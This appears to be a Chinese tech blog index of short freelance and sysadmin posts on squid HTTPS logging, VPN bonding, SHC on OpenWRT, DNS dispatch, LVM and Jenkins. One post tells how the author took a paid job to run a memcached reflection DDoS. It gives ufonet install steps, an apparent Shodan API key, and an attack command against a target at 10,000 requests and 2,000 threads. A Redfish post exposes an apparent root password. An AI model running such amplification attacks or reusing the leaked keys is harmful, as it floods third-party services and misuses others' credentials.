Freelancer任务之四squid查询用户浏览记录

这个需求也比较简单: User Browsing Log for Open VPN server 简单说就是用户连到他的openvpn服务器,通过上面的squid代理来浏览其他网站,比较特别的是需要查看用户http和https的浏览记录。 squid做透明代理,这样就可以截取浏览记录并且提供加速了 服务器是Ubuntu,缺省安装的的squid是不支持SSL的,所以需要重新编译一个 安装依赖包: sudo apt-get install build-essential fakeroot devscripts gawk gcc-multilib dpatch sudo apt-get build-dep squid3 sudo apt-get build-dep openssl sudo apt-get install libssl-dev sudo apt-get source squid3 下载到squid的源代码,以及ubuntu的修改包,解压并释放: tar zxvf squid3_3.5.12.orig.tar.gz cd squid3-3.5.12 tar xf ../squid3_3.5.12-1ubuntu7.5.debian.tar.xz 修改参数增加对ssl的支持: vi debian/rules Add --with-openssl --enable-ssl --enable-ssl-crtd under the DEB_CONFIGURE_EXTRA_FLAGS section. DEB_CONFIGURE_EXTRA_FLAGS := BUILDCXXFLAGS="$(CXXFLAGS) $(LDFLAGS)" \ ... --with-default-user=proxy \ --with-openssl \ --enable-ssl \ --enable-ssl-crtd ... 编译,会生成7个deb包 ...

2024年1月24日

Freelancer任务之五多线路聚合vpn

这个任务很有意思 任务描述: we need a set of vpn server / client programmed for embedded linux (or windows) to bond multiple 4g lte modems or wifi connectios and stitch them back together on server side to stream video feeds. the connection must be stable and have the maximum available bandwidth with no drop in some connection drops. simillar to service called SPEEDIFY (but it doesn't work well) this can be also achieved by splitting video packets and send them through different links and stitch the video packets back on the server side. 简单说,很可能它这边是个嵌入式系统,树莓派、nanopi之流的,接了4G的无线上网卡,想去聚合链路上传流媒体。 ...

2024年1月24日

Freelancer任务之六Compile an ipk file on Lede (OpenWRT)

这是一次失败的任务,即使再来一次,依然会失败,因为无法验证,真够shit的,扣了我10$的手续费。 记录一下,以儆效尤。 任务如下: Job would be to compile an ipk file of SHC that would work with LEDE OS (openwrt) and the processor used in our system - will provide details SHC can be downloaded here: http://www.datsi.fi.upm.es/~frosal/ I think you must have a 64 bit system to use the SDK to compile the file 翻译一下:在OpenWRT平台下编译一个SHC,并且能工作。 完全步骤如下: How to compile SHC on LEDE: Tested build environment: OS: Ubuntu 14.04.5 LTS CPU: ARMv7 Processor rev 5 (v7l) Before you begin, check your system is updated, i.e. sudo apt-get update sudo apt-get upgrade sudo apt-get autoremove Step-by-step manual: Note: perform all steps as regular (non-root) user. User must be in sudo group. 1. Update your sources sudo apt-get update 2. Install nesessary packages: sudo apt-get install g++ libncurses5-dev zlib1g-dev bison flex unzip autoconf gawk make gettext gcc binutils patch bzip2 libz-dev asciidoc subversion sphinxsearch libtool sphinx-common libssl-dev libssl0.9.8 3. Get latest LEDE source from git repository We know our CPU is armv7, it belongs to arm64, so go to http://downloads.lede-project.org/releases , just download sdk. wget http://downloads.lede-project.org/releases/17.01.4/targets/arm64/generic/lede-sdk-17.01.4-arm64_gcc-5.4.0_musl-1.1.16.Linux-x86_64.tar.xz 4. No Need to Update and install all LEDE packages We just want to compile shc, not other packages , so don't update. 5. Run 'make menuconfig' (Just Save and Exit) 6. Get SHC sources to LEDE package tree (we are and shc-3.8.9b.tgz is in source directory) wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.9b.tgz mkdir -p package/shc/src tar xvf shc-3.8.9b.tgz -C package/shc/src --strip-components 1 7. Make ipk Makefile vi package/shc/Makefile ############################################## # OpenWrt Makefile for shc program # # # Most of the variables used here are defined in # the include directives below. We just need to # specify a basic description of the package, # where to build our program, where to find # the source files, and where to install the # compiled program on the router. # # Be very careful of spacing in this file. # Indents should be tabs, not spaces, and # there should be no trailing whitespace in # lines that are not commented. # ############################################## include $(TOPDIR)/rules.mk # Name and release number of this package PKG_NAME:=shc PKG_VERSION:=3.8.9b PKG_MAINTAINER:=Francisco, Rosales, <frosal@fi.upm.es> # This specifies the directory where we're going to build the program. # The root build directory, $(BUILD_DIR), is by default the build_mipsel # directory in your OpenWrt SDK directory PKG_BUILD_DIR := $(BUILD_DIR)/$(PKG_NAME) include $(INCLUDE_DIR)/package.mk # Specify package information for this program. # The variables defined here should be self explanatory. # If you are running Kamikaze, delete the DESCRIPTION # variable below and uncomment the Kamikaze define # directive for the description below define Package/$(PKG_NAME) SECTION:=utils CATEGORY:=Utilities TITLE:= shc ---- This tool generates a stripped binary executable version of the script specified at command line. URL:=http://www.datsi.fi.upm.es/~frosal endef # Uncomment portion below for Kamikaze and delete DESCRIPTION variable above define Package/$(PKG_NAME)/description shc ---- This tool generates a stripped binary executable version of the script specified at command line." endef # Specify what needs to be done to prepare for building the package. # In our case, we need to copy the source files to the build directory. # This is NOT the default. The default uses the PKG_SOURCE_URL and the # PKG_SOURCE which is not defined here to download the source from the web. # In order to just build a simple program that we have just written, it is # much easier to do it this way. define Build/Prepare mkdir -p $(PKG_BUILD_DIR) $(CP) ./src/* $(PKG_BUILD_DIR)/ endef # We do not need to define Build/Configure or Build/Compile directives # The defaults are appropriate for compiling a simple program such as this one # Specify where and how to install the program. Since we only have one file, # the helloworld executable, install it by copying it to the /bin directory on # the router. The $(1) variable represents the root directory on the router running # OpenWrt. The $(INSTALL_DIR) variable contains a command to prepare the install # directory if it does not already exist. Likewise $(INSTALL_BIN) contains the # command to copy the binary file from its current location (in our case the build # directory) to the install directory. define Package/$(PKG_NAME)/install $(INSTALL_DIR) $(1)/bin $(INSTALL_BIN) $(PKG_BUILD_DIR)/shc $(1)/bin/ endef # This line executes the necessary commands to compile our program. # The above define directives specify all the information needed, but this # line calls BuildPackage which in turn actually uses this information to # build a package. $(eval $(call BuildPackage,$(PKG_NAME))) 8. Compile shc ipk without errors. make package/shc/compile V=99 9. Building process complete witout errors. Now we have : binary packages directory: source/bin/packages/aarch64_armv8-a/ [SHC_BIN] = ./bin/packages/aarch64_armv8-a/base/shc_3.8.9b_aarch64_armv8-a.ipk 10. Copy and install SHC .ipk to LEDE device. scp shc_3.8.9b_aarch64_armv8-a.ipk root@<LEDE device IP address or name>:/tmp/ ssh root@<LEDE device IP address or name> #IP usually 192.168.1.1 opkg install shc_3.8.9b_aarch64_armv8-a.ipk 11. Create test script and compile it to execute. (in LEDE shell) ssh root@<LEDE device IP address or name> #IP usually 192.168.1.1 vi /tmp/1.sh #!/bin/sh echo "hahahaha" shc -v -f /tmp/1.sh /tmp/1.sh.x 这里面有几个注意点,一个是网上有很多教程,上去就是 ...

2024年1月24日

Freelancer任务之七memcache 放大攻击

这是一次差点蚀把米的过程啊,最后争议拿回了自己的手续费,白干了一场啊,真够倒霉的。 韩国人要反射攻击。 首先clone项目: git clone https://github.com/epsylon/ufonet 原理很清楚,通过memcache的漏洞,memcache居然是UDP的,伪造源地址,发一堆请求到有漏洞的memchache,引起反射攻击。 一堆有漏洞的机器从哪获得呢?这个韩国人真的有Shodan API,手榴弹? 他的账号,确实可以看到一堆有毛病的机器 0ptoLUtmkSJ8DbAvyZ8PevTRsyLoxEuN 安装python: wget https://www.python.org/ftp/python/2.7.14/Python-2.7.14.tgz tar zxvf Python-2.7.14.tgz cd Python-2.7.14 ./configure --prefix=/export/servers/Python2714 make make install wget -O- "https://bootstrap.pypa.io/get-pip.py" | /export/servers/Python2714/bin/python /export/servers/Python2714/bin/pip install pycurl /export/servers/Python2714/bin/pip install geoip /export/servers/Python2714/bin/pip install whois /export/servers/Python2714/bin/pip install crypto /export/servers/Python2714/bin/pip install request 先去拿一堆漏洞机器的列表 cd ufonet /export/servers/Python2714/bin/python ./ufonet --sd 'botnet/dorks.txt' --sa 轰击: /export/servers/Python2714/bin/python ./ufonet./ufonet -a http://target.com -r 10000 --threads 2000

2024年1月24日

Freelancer任务之八openvpn的DNS分发

雇主给了个难题,他搭建了一个openvpn,并且有两个DNS Server,一个是带AD广告过滤的,一个是不带的。这两个dns服务在同一个机器上,端口不同。 他想让在openvpn的client端配置一下,让客户使用不同的dns server。 找了半天,没有能修改dns port的配置。 于是曲线救国。 方案如下:客户端固定IP,根据不同的来源IP来分发到不同的DNS去。 本来是想用V2EX一个哥们自己写的glider,弄了半天,不知道怎么配,不过功能肯定是能实现的。最差就是自己改go代码了。 快速起见,用了另外一个哥们的dns-dispatcher,就是dns分发,glider是彻底的各种代理转发,链条代理,非常强悍。 克隆dns-dispatcher代码 git clone https://github.com/cathuhoo/dns-dispatcher 编译: make 配置,我们只配置了udp的53端口,标准的DNS端口 vi dns-dispatch.config ; This is a test configuration file [main] file_resolvers = resolvers.txt file_policy = policy.txt file_log = /var/log/dns-dispatch.log file_pid = /var/run/dns-dispatch.pid num_threads = 3 service_port = 53 #tcpservice_port = 53 daemonize = yes 配置策略: vi policy.txt ip2 | * | Forward:bind2 ip1 | * | Forward:bind1 配置ip1和ip2 vi ip1 10.10.1.2 vi ip2 10.10.1.3 配置bind1和bind2,两个dns在10.10.1.1上,端口分别是5301和5302 vi resolvers.txt bind1|10.10.1.1|5301 bind2|10.10.1.1|5302 运行: sudo ./dns-dispatch -c dns-dispatch.config OK,搞定,所有的配置都在文件里,还有别的用法,大家用的话自己看文档吧。 ...

2024年1月24日

lxc下如何让usb设备pass through直接到达虚机

测试的同事要在测试机上安装android studio,adb直接调试手机。 这下麻烦了,测试机实际是个lxc的容器,需要把插在宿主机usb上的手机直接过给容器。 说下做法: 首先在宿主机上执行lsusb,查出手机USB: [root@localhost]# lsusb Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub Bus 002 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 001 Device 014: ID 04e8:6860 Samsung Electronics Co., Ltd GT-I9100 Phone [Galaxy S II], GT-I9300 Phone [Galaxy S III], GT-P7500 [Galaxy Tab 10.1] , GT-I9500 [Galaxy S 4] Bus 001 Device 004: ID 0624:0248 Avocent Corp. Virtual Hub Bus 001 Device 005: ID 0624:0249 Avocent Corp. Virtual Keyboard/Mouse 看最长的带GT-I9100那一行,ID 04e8:6860,VendorID:ProdID,说明Vendor=04e8 ProdID=6860,记下来。 ...

2024年1月24日

Dell的idrac redfish初探

各大主板厂商纷纷支持下一代带外管理标准redfish。 其实Dell的idrac管理做的是相当好的,那么来看看对redfish的支持吧。 先看看v1都有什么命令 curl -s "https://10.16.24.15/redfish/v1" -k -u root:xxxxxxxx | jq . 结果如下: { "@odata.context": "/redfish/v1/$metadata#ServiceRoot.ServiceRoot", "@odata.id": "/redfish/v1", "@odata.type": "#ServiceRoot.v1_1_0.ServiceRoot", "AccountService": { "@odata.id": "/redfish/v1/Managers/iDRAC.Embedded.1/AccountService" }, "Chassis": { "@odata.id": "/redfish/v1/Chassis" }, "Description": "Root Service", "EventService": { "@odata.id": "/redfish/v1/EventService" }, "Id": "RootService", "JsonSchemas": { "@odata.id": "/redfish/v1/JSONSchemas" }, "Links": { "Sessions": { "@odata.id": "/redfish/v1/Sessions" } }, "Managers": { "@odata.id": "/redfish/v1/Managers" }, "Name": "Root Service", "Oem": { "Dell": { "@odata.type": "#DellServiceRoot.v1_0_0.ServiceRootSummary", "IsBranded": 0, "ManagerMACAddress": "50:9A:4C:82:B9:3F", "ServiceTag": "7Q9N8P2" } }, "RedfishVersion": "1.0.2", "Registries": { "@odata.id": "/redfish/v1/Registries" }, "SessionService": { "@odata.id": "/redfish/v1/SessionService" }, "Systems": { "@odata.id": "/redfish/v1/Systems" }, "Tasks": { "@odata.id": "/redfish/v1/TaskService" }, "UpdateService": { "@odata.id": "/redfish/v1/UpdateService" } } 好多服务撒,挑其中一个分支看看: curl -s "https://10.16.24.15/redfish/v1/Chassis" -k -u root:alibaba | jq . 结果如下: { "@odata.context": "/redfish/v1/$metadata#ChassisCollection.ChassisCollection", "@odata.id": "/redfish/v1/Chassis/", "@odata.type": "#ChassisCollection.ChassisCollection", "Description": "Collection of Chassis", "Members": [ { "@odata.id": "/redfish/v1/Chassis/System.Embedded.1" }, { "@odata.id": "/redfish/v1/Chassis/Enclosure.Internal.0-1:RAID.Integrated.1-1" } ], "Members@odata.count": 2, "Name": "Chassis Collection" } 再试试Session的管理: ...

2024年1月24日

LVM调整分区大小

系统是xfs文件格式。/root空间不够了。必须对空间进行调整,悲剧的是xfs只能增加空间,不能缩减空间,必须曲线救国了。 查看一下,缺省有两个lvm的分区 /dev/mapper/centos-root 40G /dev/mapper/centos-home 20G 只能减小home分区,再增大root分区了。 先备份home分区,并缩小到2G: # yum -y install xfsdump # xfsdump -f /home.xfsdump /home please enter label for this dump session (timeout in 300 sec) -> home please enter label for media in drive 0 (timeout in 300 sec) -> home # umount /home # lvreduce -L 2G /dev/mapper/centos-home Do you really want to reduce home? [y/n]: y 然后扩充root分区: # lvextend -L +18G /dev/mapper/centos-root # xfs_growfs /dev/mapper/centos-root 最后恢复home分区 # mkfs.xfs -f /dev/mapper/centos-home # mount /home # xfsrestore -f /home.xfsdump /home 搞定 ...

2024年1月24日

F5-bigip的SSL每秒传输(TPS)限制

公司用到了SSL的泛域名证书,网站整体套上了HTTPS,然后最前面是F5做SSL的卸载。 麻烦也来了,F5的SSL Transactions Per Second (TPS) 是有license的,首先检查一下吧 tmsh show sys license detail | grep -i perf_SSL_total_TPS perf_SSL_total_TPS [500] 显示是500 还得查查有几个核心 tmsh show sys tmm-info global | grep -i 'TMM count' TMM Count 4 4个核心 那么每秒SSL的TPS限制就是 500X4=2000 超过2000就得去增加license了。

2024年1月24日

两台不同系统上Jenkins的联动

场景是这样的,有两台jenkins。一台是正常安装在linux上的,另外一台是在macos上的。 在macos上的这台,装了有xcode和android studio,负责ipa和apk的自动打包。 而在linux上jenkins则是主jenkins,负责很多项目的打包。 这样两台的目标就都很明确,麻烦的是需要来回登录来构建项目,那么有没有方法从第一台上直接调用第二台的项目进行构建呢? 当然可以,直接发个带Token的url到第二台就可以。 这个不是本文的重点,本文重点,源码是Git的build过程,jenkins装了Git parameter插件后支持选tag进行building。 这样如果两台都这么来一下,实际是在两台都git check了一下,然后开始build,这对于第一台来说,毫无必要。 第一台主jenkins的任务就是看看git项目中都有什么tag,然后把tag发链接给第二台即可,没必要check的。 而第二台也不去看tag,直接从git中checkout出第一台传过来的tag版本,进行构造,这样最省资源。 那么,怎么让第一台只查看tag呢? 万能的groovy大法: def gettags = "git ls-remote -t git@git.coding.net:doabc/app-abc.git".execute() def tags = [] def t1 = [] gettags.text.eachLine {tags.add(it)} for(i in tags) t1.add(i.split()[1].replaceAll('\\^\\{\\}', '').replaceAll('refs/tags/', '')) t1 = t1.unique() return t1 注意上面,groovy和git的证书需要都事先配好。

2024年1月24日